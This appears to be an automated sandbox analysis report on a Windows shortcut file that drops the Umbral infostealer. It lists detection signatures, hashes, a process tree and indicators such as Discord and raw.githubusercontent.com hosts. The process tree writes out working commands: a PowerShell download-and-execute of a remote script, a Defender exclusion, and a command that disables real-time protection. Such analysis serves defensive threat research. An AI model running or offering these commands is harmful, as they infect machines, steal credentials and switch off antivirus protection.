Resubmissions
23/03/2025, 14:55
250323-san3jsyjv6 1023/03/2025, 14:54
250323-r9t76sxr17 1023/03/2025, 14:51
250323-r74zlaxrv8 10Analysis
-
max time kernel
10s -
max time network
10s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
23/03/2025, 14:55
Static task
static1
General
-
Target
1231321312.lnk
-
Size
2KB
-
MD5
a83ed03220cbc79bcbcaae9a57d0b95a
-
SHA1
062d88505a421b491c8614ccff1d8fdd34453e18
-
SHA256
c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033
-
SHA512
97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000002427d-21.dat family_umbral behavioral1/memory/5428-30-0x000001E0955D0000-0x000001E095610000-memory.dmp family_umbral -
Umbral family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 5476 powershell.exe 12 5476 powershell.exe -
pid Process 5476 powershell.exe 1372 powershell.exe 1160 powershell.exe 4204 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 5428 Umbral.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 41 discord.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com 40 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5228 wmic.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 5476 powershell.exe 5476 powershell.exe 1372 powershell.exe 1372 powershell.exe 1372 powershell.exe 1160 powershell.exe 1160 powershell.exe 1160 powershell.exe 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5476 powershell.exe Token: SeDebugPrivilege 5428 Umbral.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeIncreaseQuotaPrivilege 5524 wmic.exe Token: SeSecurityPrivilege 5524 wmic.exe Token: SeTakeOwnershipPrivilege 5524 wmic.exe Token: SeLoadDriverPrivilege 5524 wmic.exe Token: SeSystemProfilePrivilege 5524 wmic.exe Token: SeSystemtimePrivilege 5524 wmic.exe Token: SeProfSingleProcessPrivilege 5524 wmic.exe Token: SeIncBasePriorityPrivilege 5524 wmic.exe Token: SeCreatePagefilePrivilege 5524 wmic.exe Token: SeBackupPrivilege 5524 wmic.exe Token: SeRestorePrivilege 5524 wmic.exe Token: SeShutdownPrivilege 5524 wmic.exe Token: SeDebugPrivilege 5524 wmic.exe Token: SeSystemEnvironmentPrivilege 5524 wmic.exe Token: SeRemoteShutdownPrivilege 5524 wmic.exe Token: SeUndockPrivilege 5524 wmic.exe Token: SeManageVolumePrivilege 5524 wmic.exe Token: 33 5524 wmic.exe Token: 34 5524 wmic.exe Token: 35 5524 wmic.exe Token: 36 5524 wmic.exe Token: SeIncreaseQuotaPrivilege 5524 wmic.exe Token: SeSecurityPrivilege 5524 wmic.exe Token: SeTakeOwnershipPrivilege 5524 wmic.exe Token: SeLoadDriverPrivilege 5524 wmic.exe Token: SeSystemProfilePrivilege 5524 wmic.exe Token: SeSystemtimePrivilege 5524 wmic.exe Token: SeProfSingleProcessPrivilege 5524 wmic.exe Token: SeIncBasePriorityPrivilege 5524 wmic.exe Token: SeCreatePagefilePrivilege 5524 wmic.exe Token: SeBackupPrivilege 5524 wmic.exe Token: SeRestorePrivilege 5524 wmic.exe Token: SeShutdownPrivilege 5524 wmic.exe Token: SeDebugPrivilege 5524 wmic.exe Token: SeSystemEnvironmentPrivilege 5524 wmic.exe Token: SeRemoteShutdownPrivilege 5524 wmic.exe Token: SeUndockPrivilege 5524 wmic.exe Token: SeManageVolumePrivilege 5524 wmic.exe Token: 33 5524 wmic.exe Token: 34 5524 wmic.exe Token: 35 5524 wmic.exe Token: 36 5524 wmic.exe Token: SeIncreaseQuotaPrivilege 1396 wmic.exe Token: SeSecurityPrivilege 1396 wmic.exe Token: SeTakeOwnershipPrivilege 1396 wmic.exe Token: SeLoadDriverPrivilege 1396 wmic.exe Token: SeSystemProfilePrivilege 1396 wmic.exe Token: SeSystemtimePrivilege 1396 wmic.exe Token: SeProfSingleProcessPrivilege 1396 wmic.exe Token: SeIncBasePriorityPrivilege 1396 wmic.exe Token: SeCreatePagefilePrivilege 1396 wmic.exe Token: SeBackupPrivilege 1396 wmic.exe Token: SeRestorePrivilege 1396 wmic.exe Token: SeShutdownPrivilege 1396 wmic.exe Token: SeDebugPrivilege 1396 wmic.exe Token: SeSystemEnvironmentPrivilege 1396 wmic.exe Token: SeRemoteShutdownPrivilege 1396 wmic.exe Token: SeUndockPrivilege 1396 wmic.exe Token: SeManageVolumePrivilege 1396 wmic.exe Token: 33 1396 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4924 wrote to memory of 5476 4924 cmd.exe 88 PID 4924 wrote to memory of 5476 4924 cmd.exe 88 PID 5476 wrote to memory of 5428 5476 powershell.exe 97 PID 5476 wrote to memory of 5428 5476 powershell.exe 97 PID 5428 wrote to memory of 1372 5428 Umbral.exe 100 PID 5428 wrote to memory of 1372 5428 Umbral.exe 100 PID 5428 wrote to memory of 1160 5428 Umbral.exe 102 PID 5428 wrote to memory of 1160 5428 Umbral.exe 102 PID 5428 wrote to memory of 5524 5428 Umbral.exe 104 PID 5428 wrote to memory of 5524 5428 Umbral.exe 104 PID 5428 wrote to memory of 1396 5428 Umbral.exe 106 PID 5428 wrote to memory of 1396 5428 Umbral.exe 106 PID 5428 wrote to memory of 5404 5428 Umbral.exe 108 PID 5428 wrote to memory of 5404 5428 Umbral.exe 108 PID 5428 wrote to memory of 4204 5428 Umbral.exe 110 PID 5428 wrote to memory of 4204 5428 Umbral.exe 110 PID 5428 wrote to memory of 5228 5428 Umbral.exe 112 PID 5428 wrote to memory of 5228 5428 Umbral.exe 112
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5476 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5524
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:5404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4204
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:5228
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5d0744ae10dfb4e478d9126b3bcaed1f8
SHA1ef7dc64d087ab242fbe4bd699f77c2ca46eedf3e
SHA25610ee655a08c2e704dc1f6840997a80e50ffedc19a35a13009f3c62223e7b28af
SHA5123ae25ee6fd4b7810f85cdd0fb81da1a34c481be82bd908abcb022fc8f24392342637670dd01b0e84e933e96e2cecfd1fd27b76ac3502c08f44f9f342d987d8e4
-
Filesize
944B
MD52c1a3a6f455a6fe61abc847cb464fb63
SHA1a40a850408ffcb6d524ff723b637f8817b034d9c
SHA25661fd62153ebeaba4ee60d920b536320cffde754e25626ccb0ea65061050a7d63
SHA51215e32523649f2bb53d7e576fc97682427ba14765bbe36ce07aede0a1aeb1a1f150cf4566cdf28049abcf8149616f4874fa6a41e2206aded818aec8ffbdf755b9
-
Filesize
948B
MD574a6b79d36b4aae8b027a218bc6e1af7
SHA10350e46c1df6934903c4820a00b0bc4721779e5f
SHA25660c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04
SHA51260e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0
-
Filesize
227KB
MD568b35208a6ccc5cf6cfa41f86712e7ab
SHA134c735c3cc8fd7f9d225cd7323e5632aa772f465
SHA2564a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279
SHA512f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82